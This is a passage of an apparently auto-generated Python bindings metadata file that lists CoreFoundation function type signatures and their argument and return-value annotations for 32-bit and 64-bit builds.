sel32or64(
b"@^{__CFAllocator=}^{__CFReadStream=}lL^l^^{__CFError=}",
b"@^{__CFAllocator=}^{__CFReadStream=}qQ^q^^{__CFError=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
4: {"type_modifier": "o"},
5: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
},
},
},
),
"CFFileSecurityClearProperties": (
sel32or64(b"Z^{__CFFileSecurity=}L", b"Z^{__CFFileSecurity=}Q"),
),
"CFURLCopyResourcePropertyForKey": (
b"Z^{__CFURL=}^{__CFString=}^@^^{__CFError=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {"already_cfretained": True, "type_modifier": "o"},
3: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
},
},
},
),
"CFDateFormatterCopyProperty": (
b"@^{__CFDateFormatter=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFSwapInt64LittleToHost": (b"QQ",),
"CFUserNotificationReceiveResponse": (
sel32or64(b"l^{__CFUserNotification=}d^L", b"i^{__CFUserNotification=}d^Q"),
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFNumberFormatterGetLocale": (b"^{__CFLocale=}^{__CFNumberFormatter=}",),
"CFURLStartAccessingSecurityScopedResource": (b"Z^{__CFURL=}",),
"CFMachPortCreateRunLoopSource": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFMachPort=}l",
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFMachPort=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFURLGetBytes": (
sel32or64(b"l^{__CFURL=}^Cl", b"q^{__CFURL=}^Cq"),
"",
{
"arguments": {
1: {
"c_array_length_in_arg": 2,
"c_array_length_in_result": True,
"type_modifier": "o",
}
}
},
),
"CFFileDescriptorGetNativeDescriptor": (b"i^{__CFFileDescriptor=}",),
"CFTimeZoneSetAbbreviationDictionary": (b"v^{__CFDictionary=}",),
"CFUserNotificationGetTypeID": (sel32or64(b"L", b"Q"),),
"CFTimeZoneCopySystem": (
b"^{__CFTimeZone=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFShowStr": (b"v^{__CFString=}",),
"CFURLEnumeratorGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleCopyResourceURL": (
b"^{__CFURL=}^{__CFBundle=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorGetBits": (
sel32or64(
b"v^{__CFBitVector=}{_CFRange=ll}^C", b"v^{__CFBitVector=}{_CFRange=qq}^C"
),
"",
{"arguments": {2: {"c_array_of_variable_length": True, "type_modifier": "o"}}},
),
"CFFileSecuritySetGroup": (b"Z^{__CFFileSecurity=}I",),
"CFNotificationCenterGetLocalCenter": (b"^{__CFNotificationCenter=}",),
"CFTimeZoneGetData": (b"^{__CFData=}^{__CFTimeZone=}",),
"CFArrayReplaceValues": (
sel32or64(b"v^{__CFArray=}{_CFRange=ll}^@l", b"v^{__CFArray=}{_CFRange=qq}^@q"),
"",
{"arguments": {2: {"c_array_length_in_arg": 3, "type_modifier": "n"}}},
),
"CFStringGetCharactersPtr": (
b"^T^{__CFString=}",
"",
{"retval": {"c_array_delimited_by_null": True}},
),
"CFStringTokenizerGoToTokenAtIndex": (
sel32or64(b"L^{__CFStringTokenizer=}l", b"Q^{__CFStringTokenizer=}q"),
),
"CFBundleGetIdentifier": (b"^{__CFString=}^{__CFBundle=}",),
"CFTreeApplyFunctionToChildren": (
b"v^{__CFTree=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"@"}},
},
"callable_retained": False,
}
}
},
),
"CFDataGetTypeID": (sel32or64(b"L", b"Q"),),
"CFRunLoopAddCommonMode": (b"v^{__CFRunLoop=}^{__CFString=}",),
"CFCalendarSetLocale": (b"v^{__CFCalendar=}^{__CFLocale=}",),
"CFStreamCreatePairWithSocketToHost": (
sel32or64(
b"v^{__CFAllocator=}^{__CFString=}L^^{__CFReadStream=}^^{__CFWriteStream=}",
b"v^{__CFAllocator=}^{__CFString=}I^^{__CFReadStream=}^^{__CFWriteStream=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "o"}, 4: {"type_modifier": "o"}},
},
),
"CFNumberCreate": (
sel32or64(
b"^{__CFNumber=}^{__CFAllocator=}l^v", b"^{__CFNumber=}^{__CFAllocator=}q^v"
),
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetAddCharactersInRange": (
sel32or64(
b"v^{__CFCharacterSet=}{_CFRange=ll}", b"v^{__CFCharacterSet=}{_CFRange=qq}"
),
),
"CFMessagePortIsRemote": (b"Z^{__CFMessagePort=}",),
"CFURLGetTypeID": (sel32or64(b"L", b"Q"),),
"CFReadStreamGetError": (
sel32or64(
b"{_CFStreamError=ll}^{__CFReadStream=}",
b"{_CFStreamError=qi}^{__CFReadStream=}",
),
),
"CFBagCreateMutableCopy": (
sel32or64(
b"^{__CFBag=}^{__CFAllocator=}l^{__CFBag=}",
b"^{__CFBag=}^{__CFAllocator=}q^{__CFBag=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFWriteStreamCreateWithAllocatedBuffers": (
b"^{__CFWriteStream=}^{__CFAllocator=}^{__CFAllocator=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBagGetTypeID": (sel32or64(b"L", b"Q"),),
"CFCalendarGetTimeRangeOfUnit": (
sel32or64(b"Z^{__CFCalendar=}Ld^d^d", b"Z^{__CFCalendar=}Qd^d^d"),
"",
{"arguments": {3: {"type_modifier": "o"}, 4: {"type_modifier": "o"}}},
),
"CFBundlePreflightExecutable": (
b"Z^{__CFBundle=}^^{__CFError=}",
"",
{
"arguments": {
1: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFArrayRemoveAllValues": (b"v^{__CFArray=}",),
"CFStringGetLineBounds": (
sel32or64(
b"v^{__CFString=}{_CFRange=ll}^l^l^l", b"v^{__CFString=}{_CFRange=qq}^q^q^q"
),
"",
{
"arguments": {
2: {"type_modifier": "o"},
3: {"type_modifier": "o"},
4: {"type_modifier": "o"},
}
},
),
"CFTimeZoneCopyAbbreviation": (
b"^{__CFString=}^{__CFTimeZone=}d",
"",
{"retval": {"already_cfretained": True}},
),
"CFFileSecurityGetGroup": (
b"Z^{__CFFileSecurity=}^I",
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFCharacterSetGetPredefined": (
sel32or64(b"^{__CFCharacterSet=}l", b"^{__CFCharacterSet=}q"),
),
"CFArrayRemoveValueAtIndex": (sel32or64(b"v^{__CFArray=}l", b"v^{__CFArray=}q"),),
"CFStringGetSmallestEncoding": (sel32or64(b"L^{__CFString=}", b"I^{__CFString=}"),),
"CFTreeAppendChild": (b"v^{__CFTree=}^{__CFTree=}",),
"CFURLCreatePropertyFromResource": (
sel32or64(
b"@^{__CFAllocator=}^{__CFURL=}^{__CFString=}^l",
b"@^{__CFAllocator=}^{__CFURL=}^{__CFString=}^i",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "o"}},
},
),
"CFURLCopyHostName": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAbsoluteTimeGetDayOfWeek": (
sel32or64(b"ld^{__CFTimeZone=}", b"id^{__CFTimeZone=}"),
),
"CFSwapInt64HostToLittle": (b"QQ",),
"CFArrayExchangeValuesAtIndices": (
sel32or64(b"v^{__CFArray=}ll", b"v^{__CFArray=}qq"),
),
"CFTimeZoneGetTypeID": (sel32or64(b"L", b"Q"),),
"CFRunLoopObserverCreate": (
sel32or64(
b"^{__CFRunLoopObserver=}^{__CFAllocator=}LZl^?^{_CFRunLoopObserverContext=l^v^?^?^?}",
b"^{__CFRunLoopObserver=}^{__CFAllocator=}QZq^?^{_CFRunLoopObserverContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
4: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFRunLoopObserver=}"},
1: {"type": b"Q"},
2: {"type": b"^v"},
},
}
}
},
},
),
"CFRunLoopTimerGetTolerance": (b"d^{__CFRunLoopTimer=}",),
"CFBinaryHeapCreateCopy": (
sel32or64(
b"^{__CFBinaryHeap=}^{__CFAllocator=}l^{__CFBinaryHeap=}",
b"^{__CFBinaryHeap=}^{__CFAllocator=}q^{__CFBinaryHeap=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateFromExternalRepresentation": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^{__CFData=}L",
b"^{__CFString=}^{__CFAllocator=}^{__CFData=}I",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFTimeZoneResetSystem": (b"v",),
"CFStringNormalize": (sel32or64(b"v^{__CFString=}l", b"v^{__CFString=}q"),),
"CFRunLoopContainsSource": (
b"Z^{__CFRunLoop=}^{__CFRunLoopSource=}^{__CFString=}",
),
"CFLocaleCreateCanonicalLanguageIdentifierFromString": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopGetTypeID": (sel32or64(b"L", b"Q"),),
"CFDictionaryApplyFunction": (
b"v^{__CFDictionary=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"@"},
1: {"type": b"@"},
2: {"type": b"@"},
},
},
"callable_retained": False,
}
}
},
),
"CFLocaleGetLanguageCharacterDirection": (
sel32or64(b"l^{__CFString=}", b"q^{__CFString=}"),
),
"CFStringCreateArrayWithFindResults": (
sel32or64(
b"^{__CFArray=}^{__CFAllocator=}^{__CFString=}^{__CFString=}{_CFRange=ll}L",
b"^{__CFArray=}^{__CFAllocator=}^{__CFString=}^{__CFString=}{_CFRange=qq}Q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFArrayGetTypeID": (sel32or64(b"L", b"Q"),),
"CFNumberFormatterSetFormat": (b"v^{__CFNumberFormatter=}^{__CFString=}",),
"CFStreamCreatePairWithSocket": (
b"v^{__CFAllocator=}i^^{__CFReadStream=}^^{__CFWriteStream=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {2: {"type_modifier": "o"}, 3: {"type_modifier": "o"}},
},
),
"CFBitVectorCreateMutableCopy": (
sel32or64(
b"^{__CFBitVector=}^{__CFAllocator=}l^{__CFBitVector=}",
b"^{__CFBitVector=}^{__CFAllocator=}q^{__CFBitVector=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFPreferencesGetAppBooleanValue": (
b"Z^{__CFString=}^{__CFString=}^Z",
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFSocketSetAddress": (
sel32or64(b"l^{__CFSocket=}^{__CFData=}", b"q^{__CFSocket=}^{__CFData=}"),
),
"CFRunLoopCopyAllModes": (
b"^{__CFArray=}^{__CFRunLoop=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateStringByReplacingPercentEscapesUsingEncoding": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFString=}L",
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFString=}I",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopRun": (b"v",),
"CFPreferencesGetAppIntegerValue": (
sel32or64(
b"l^{__CFString=}^{__CFString=}^Z", b"q^{__CFString=}^{__CFString=}^Z"
),
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFMessagePortSetName": (b"Z^{__CFMessagePort=}^{__CFString=}",),
"CFDateFormatterCreate": (
sel32or64(
b"^{__CFDateFormatter=}^{__CFAllocator=}^{__CFLocale=}ll",
b"^{__CFDateFormatter=}^{__CFAllocator=}^{__CFLocale=}qq",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFUUIDCreateString": (
b"^{__CFString=}^{__CFAllocator=}^{__CFUUID=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFNumberFormatterCreate": (
sel32or64(
b"^{__CFNumberFormatter=}^{__CFAllocator=}^{__CFLocale=}l",
b"^{__CFNumberFormatter=}^{__CFAllocator=}^{__CFLocale=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLParserGetStatusCode": (
sel32or64(b"l^{__CFXMLParser=}", b"q^{__CFXMLParser=}"),
),
"CFCalendarGetMinimumRangeOfUnit": (
sel32or64(b"{_CFRange=ll}^{__CFCalendar=}L", b"{_CFRange=qq}^{__CFCalendar=}Q"),
),
"CFBitVectorCreateCopy": (
b"^{__CFBitVector=}^{__CFAllocator=}^{__CFBitVector=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFTimeZoneGetSecondsFromGMT": (b"d^{__CFTimeZone=}d",),
"CFRunLoopTimerDoesRepeat": (b"Z^{__CFRunLoopTimer=}",),
"CFCharacterSetCreateInvertedSet": (
b"^{__CFCharacterSet=}^{__CFAllocator=}^{__CFCharacterSet=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetParagraphBounds": (
sel32or64(
b"v^{__CFString=}{_CFRange=ll}^l^l^l", b"v^{__CFString=}{_CFRange=qq}^q^q^q"
),
"",
{
"arguments": {
2: {"type_modifier": "o"},
3: {"type_modifier": "o"},
4: {"type_modifier": "o"},
}
},
),
"CFStringGetSystemEncoding": (sel32or64(b"L", b"I"),),
"CFBundleCopyResourceURLsOfTypeInDirectory": (
b"^{__CFArray=}^{__CFURL=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringCreateMutableCopy": (
sel32or64(
b"^{__CFAttributedString=}^{__CFAllocator=}l^{__CFAttributedString=}",
b"^{__CFAttributedString=}^{__CFAllocator=}q^{__CFAttributedString=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringTokenizerGetCurrentSubTokens": (
sel32or64(
b"l^{__CFStringTokenizer=}^{_CFRange=ll}l^{__CFArray=}",
b"q^{__CFStringTokenizer=}^{_CFRange=qq}q^{__CFArray=}",
),
"",
{
"arguments": {
1: {
"c_array_length_in_result": True,
"c_array_length_in_arg": 2,
"type_modifier": "o",
}
}
},
),
"CFBundleCopyBundleURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLNodeGetInfoPtr": (b"^v^{__CFXMLNode=}",),
"CFSocketCreateConnectedToSocketSignature": (
sel32or64(
b"^{__CFSocket=}^{__CFAllocator=}^{_CFSocketSignature=lll^{__CFData=}}L^?^{_CFSocketContext=l^v^?^?^?}d",
b"^{__CFSocket=}^{__CFAllocator=}^{_CFSocketSignature=iii^{__CFData=}}Q^?^{_CFSocketContext=q^v^?^?^?}d",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFSocket=}"},
1: {"type": b"Q"},
2: {"type": b"^{__CFData=}"},
3: {"type": b"^v"},
4: {"type": b"^v"},
},
}
}
},
},
),
"CFURLCreateDataAndPropertiesFromResource": (
sel32or64(
b"Z^{__CFAllocator=}^{__CFURL=}^^{__CFData=}^^{__CFDictionary=}^{__CFArray=}^l",
b"Z^{__CFAllocator=}^{__CFURL=}^^{__CFData=}^^{__CFDictionary=}^{__CFArray=}^i",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {"type_modifier": "o"},
3: {"type_modifier": "o"},
5: {"type_modifier": "o"},
},
},
),
"CFAbsoluteTimeGetWeekOfYear": (
sel32or64(b"ld^{__CFTimeZone=}", b"id^{__CFTimeZone=}"),
),
"CFDateFormatterSetProperty": (b"v^{__CFDateFormatter=}^{__CFString=}@",),
"CFTreeGetTypeID": (sel32or64(b"L", b"Q"),),
"CFRunLoopStop": (b"v^{__CFRunLoop=}",),
"CFNotificationCenterPostNotification": (
b"v^{__CFNotificationCenter=}^{__CFString=}@^{__CFDictionary=}Z",
),
"CFXMLTreeCreateFromData": (
sel32or64(
b"^{__CFTree=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Ll",
b"^{__CFTree=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Qq",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCopyBuiltInPlugInsURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLTreeCreateWithDataFromURL": (
sel32or64(
b"^{__CFTree=}^{__CFAllocator=}^{__CFURL=}Ll",
b"^{__CFTree=}^{__CFAllocator=}^{__CFURL=}Qq",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFLocaleCreateComponentsFromLocaleIdentifier": (
b"^{__CFDictionary=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFPropertyListIsValid": (sel32or64(b"Z@l", b"Z@q"),),
"CFNumberFormatterGetDecimalInfoForCurrencyCode": (
b"Z^{__CFString=}^i^d",
"",
{"arguments": {1: {"type_modifier": "o"}, 2: {"type_modifier": "o"}}},
),
"CFSocketEnableCallBacks": (sel32or64(b"v^{__CFSocket=}L", b"v^{__CFSocket=}Q"),),
"CFSetCreateCopy": (
b"^{__CFSet=}^{__CFAllocator=}^{__CFSet=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFSwapInt64BigToHost": (b"QQ",),
"CFReadStreamGetTypeID": (sel32or64(b"L", b"Q"),),
"CFFileDescriptorCreate": (
sel32or64(
b"^{__CFFileDescriptor=}^{__CFAllocator=}iZ^?^{_CFFileDescriptorContext=l^v^?^?^?}",
b"^{__CFFileDescriptor=}^{__CFAllocator=}iZ^?^{_CFFileDescriptorContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFFileDescriptor=}"},
1: {"type": b"Q"},
2: {"type": b"^v"},
},
}
}
},
},
),
"CFBagCreateMutable": (
sel32or64(
b"^{__CFBag=}^{__CFAllocator=}l^{_CFBagCallBacks=l^?^?^?^?^?}",
b"^{__CFBag=}^{__CFAllocator=}q^{_CFBagCallBacks=q^?^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateWithString": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDictionaryAddValue": (b"v^{__CFDictionary=}@@",),
"CFFileSecurityCreateCopy": (
b"^{__CFFileSecurity=}^{__CFAllocator=}^{__CFFileSecurity=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetRemoveCharactersInString": (b"v^{__CFCharacterSet=}^{__CFString=}",),
"CFRunLoopRemoveObserver": (
b"v^{__CFRunLoop=}^{__CFRunLoopObserver=}^{__CFString=}",
),
"CFAttributedStringGetMutableString": (b"^{__CFString=}^{__CFAttributedString=}",),
"CFDictionaryCreate": (
sel32or64(
b"^{__CFDictionary=}^{__CFAllocator=}^^v^^vl^{_CFDictionaryKeyCallBacks=l^?^?^?^?^?}^{_CFDictionaryValueCallBacks=l^?^?^?^?}",
b"^{__CFDictionary=}^{__CFAllocator=}^^v^^vq^{_CFDictionaryKeyCallBacks=q^?^?^?^?^?}^{_CFDictionaryValueCallBacks=q^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFNumberGetByteSize": (sel32or64(b"l^{__CFNumber=}", b"q^{__CFNumber=}"),),
"CFXMLParserCopyErrorDescription": (
b"^{__CFString=}^{__CFXMLParser=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetCreateWithBitmapRepresentation": (
b"^{__CFCharacterSet=}^{__CFAllocator=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleGetValueForInfoDictionaryKey": (b"@^{__CFBundle=}^{__CFString=}",),
"CFXMLParserGetCallBacks": (
sel32or64(
b"v^{__CFXMLParser=}^{_CFXMLParserCallBacks=l^?^?^?^?^?}",
b"v^{__CFXMLParser=}^{_CFXMLParserCallBacks=q^?^?^?^?^?}",
),
),
"CFWriteStreamUnscheduleFromRunLoop": (
b"v^{__CFWriteStream=}^{__CFRunLoop=}^{__CFString=}",
),
"CFAttributedStringCreateCopy": (
b"^{__CFAttributedString=}^{__CFAllocator=}^{__CFAttributedString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorSetBitAtIndex": (
sel32or64(b"v^{__CFBitVector=}lL", b"v^{__CFBitVector=}qI"),
),
"CFReadStreamSetDispatchQueue": (
sel32or64(b"v^{__CFReadStream=}^{dispatch_queue_s=}", b"v^{__CFReadStream=}@"),
),
"CFMessagePortSetDispatchQueue": (
sel32or64(
b"v^{__CFMessagePort=}^{dispatch_queue_s=}", b"v^{__CFMessagePort=}@"
),
),
"CFStringGetNameOfEncoding": (sel32or64(b"^{__CFString=}L", b"^{__CFString=}I"),),
"CFBitVectorSetAllBits": (
sel32or64(b"v^{__CFBitVector=}L", b"v^{__CFBitVector=}I"),
),
"CFSocketGetContext": (
sel32or64(
b"v^{__CFSocket=}^{_CFSocketContext=l^v^?^?^?}",
b"v^{__CFSocket=}^{_CFSocketContext=q^v^?^?^?}",
),
),
"CFLocaleGetWindowsLocaleCodeFromLocaleIdentifier": (b"I^{__CFString=}",),
"CFXMLParserGetLineNumber": (
sel32or64(b"l^{__CFXMLParser=}", b"q^{__CFXMLParser=}"),
),
"CFTimeZoneGetDaylightSavingTimeOffset": (b"d^{__CFTimeZone=}d",),
"CFPreferencesAddSuitePreferencesToApp": (b"v^{__CFString=}^{__CFString=}",),
"CFURLGetFileSystemRepresentation": (
sel32or64(b"Z^{__CFURL=}Z^tl", b"Z^{__CFURL=}Z^tq"),
"",
{
"arguments": {
2: {
"c_array_delimited_by_null": True,
"type_modifier": "o",
"c_array_length_in_arg": 3,
}
}
},
),
"CFSetApplyFunction": (
b"v^{__CFSet=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"@"}},
},
"callable_retained": False,
}
}
},
),
"CFStringCapitalize": (b"v^{__CFString=}^{__CFLocale=}",),
"CFBinaryHeapGetMinimumIfPresent": (
b"Z^{__CFBinaryHeap=}^@",
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFURLCopyPathExtension": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFLocaleCopyISOCountryCodes": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFLocaleCreateCopy": (
b"^{__CFLocale=}^{__CFAllocator=}^{__CFLocale=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLEnumeratorSkipDescendents": (b"v^{__CFURLEnumerator=}",),
"CFBinaryHeapAddValue": (b"v^{__CFBinaryHeap=}@",),
"CFBinaryHeapGetValues": (b"v^{__CFBinaryHeap=}^^v",),
"CFDateFormatterGetAbsoluteTimeFromString": (
sel32or64(
b"Z^{__CFDateFormatter=}^{__CFString=}^{_CFRange=ll}^d",
b"Z^{__CFDateFormatter=}^{__CFString=}^{_CFRange=qq}^d",
),
"",
{"arguments": {2: {"type_modifier": "N"}, 3: {"type_modifier": "o"}}},
),
"CFTreeSortChildren": (
b"v^{__CFTree=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"l"},
"arguments": {
0: {"type": b"@"},
1: {"type": b"@"},
2: {"type": b"@"},
},
},
"callable_retained": False,
}
}
},
),
"CFURLCopyResourcePropertiesForKeys": (
b"^{__CFDictionary=}^{__CFURL=}^{__CFArray=}^^{__CFError=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFNumberCompare": (
sel32or64(
b"l^{__CFNumber=}^{__CFNumber=}^v", b"q^{__CFNumber=}^{__CFNumber=}^v"
),
),
"CFURLHasDirectoryPath": (b"Z^{__CFURL=}",),
"CFSwapInt16HostToBig": (b"SS",),
"CFXMLCreateStringByEscapingEntities": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFPreferencesSetMultiple": (
b"v^{__CFDictionary=}^{__CFArray=}^{__CFString=}^{__CFString=}^{__CFString=}",
),
"CFBagGetValue": (b"@^{__CFBag=}@",),
"CFBundleGetBundleWithIdentifier": (b"^{__CFBundle=}^{__CFString=}",),
"CFMakeCollectable": (b"@@",),
"CFSetGetTypeID": (sel32or64(b"L", b"Q"),),
"CFStringAppendFormat": (
b"v^{__CFString=}^{__CFDictionary=}^{__CFString=}",
"",
{"arguments": {2: {"printf_format": True}}, "variadic": True},
),
"CFNumberGetValue": (sel32or64(b"Z^{__CFNumber=}l^v", b"Z^{__CFNumber=}q^v"),),
"CFStringTokenizerSetString": (
sel32or64(
b"v^{__CFStringTokenizer=}^{__CFString=}{_CFRange=ll}",
b"v^{__CFStringTokenizer=}^{__CFString=}{_CFRange=qq}",
),
),
"CFRunLoopGetMain": (b"^{__CFRunLoop=}",),
"CFDictionaryRemoveAllValues": (b"v^{__CFDictionary=}",),
"CFPropertyListCreateDeepCopy": (
sel32or64(b"@^{__CFAllocator=}@L", b"@^{__CFAllocator=}@Q"),
"",
{"retval": {"already_cfretained": True}},
),
"CFUUIDGetTypeID": (sel32or64(b"L", b"Q"),),
"CFNotificationCenterPostNotificationWithOptions": (
sel32or64(
b"v^{__CFNotificationCenter=}^{__CFString=}@^{__CFDictionary=}L",
b"v^{__CFNotificationCenter=}^{__CFString=}@^{__CFDictionary=}Q",
),
),
"CFStringLowercase": (b"v^{__CFString=}^{__CFLocale=}",),
"CFCalendarSetMinimumDaysInFirstWeek": (
sel32or64(b"v^{__CFCalendar=}l", b"v^{__CFCalendar=}q"),
),
"CFRetain": (b"@@",),
"CFStringGetCharacters": (
sel32or64(b"v^{__CFString=}{_CFRange=ll}^T", b"v^{__CFString=}{_CFRange=qq}^T"),
"",
{"arguments": {2: {"c_array_length_in_arg": 1, "type_modifier": "o"}}},
),
"CFTimeZoneGetName": (b"^{__CFString=}^{__CFTimeZone=}",),
"CFURLCopyStrictPath": (
b"^{__CFString=}^{__CFURL=}^Z",
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"type_modifier": "o"}},
},
),
"CFBundleIsExecutableLoaded": (b"Z^{__CFBundle=}",),
"CFArrayAppendArray": (
sel32or64(
b"v^{__CFArray=}^{__CFArray=}{_CFRange=ll}",
b"v^{__CFArray=}^{__CFArray=}{_CFRange=qq}",
),
),
"CFNumberFormatterGetTypeID": (sel32or64(b"L", b"Q"),),
"CFDateGetTypeID": (sel32or64(b"L", b"Q"),),
"CFPreferencesCopyMultiple": (
b"^{__CFDictionary=}^{__CFArray=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBinaryHeapGetTypeID": (sel32or64(b"L", b"Q"),),
"CFTimeZoneCopyLocalizedName": (
sel32or64(
b"^{__CFString=}^{__CFTimeZone=}l^{__CFLocale=}",
b"^{__CFString=}^{__CFTimeZone=}q^{__CFLocale=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFCalendarCopyLocale": (
b"^{__CFLocale=}^{__CFCalendar=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFFileDescriptorDisableCallBacks": (
sel32or64(b"v^{__CFFileDescriptor=}L", b"v^{__CFFileDescriptor=}Q"),
),
"CFBundleLoadExecutableAndReturnError": (
b"Z^{__CFBundle=}^^{__CFError=}",
"",
{
"arguments": {
1: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFNumberFormatterCreateNumberFromString": (
sel32or64(
b"^{__CFNumber=}^{__CFAllocator=}^{__CFNumberFormatter=}^{__CFString=}^{_CFRange=ll}L",
b"^{__CFNumber=}^{__CFAllocator=}^{__CFNumberFormatter=}^{__CFString=}^{_CFRange=qq}Q",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "N"}},
},
),
"CFAttributedStringGetAttribute": (
sel32or64(
b"@^{__CFAttributedString=}l^{__CFString=}^{_CFRange=ll}",
b"@^{__CFAttributedString=}q^{__CFString=}^{_CFRange=qq}",
),
"",
{"arguments": {3: {"type_modifier": "o"}}},
),
"CFURLCopyLastPathComponent": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCopyResourcesDirectoryURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopGetCurrent": (b"^{__CFRunLoop=}",),
"CFDateFormatterCreateDateFromString": (
sel32or64(
b"^{__CFDate=}^{__CFAllocator=}^{__CFDateFormatter=}^{__CFString=}^{_CFRange=ll}",
b"^{__CFDate=}^{__CFAllocator=}^{__CFDateFormatter=}^{__CFString=}^{_CFRange=qq}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "N"}},
},
),
"CFURLEnumeratorGetDescendentLevel": (
sel32or64(b"l^{__CFURLEnumerator=}", b"q^{__CFURLEnumerator=}"),
),
"CFStringGetSurrogatePairForLongCharacter": (
sel32or64(b"ZL^T", b"ZI^T"),
"",
{"arguments": {1: {"c_array_of_fixed_length": 2, "type_modifier": "o"}}},
),
"CFBagApplyFunction": (
b"v^{__CFBag=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"@"}},
},
"callable_retained": False,
}
}
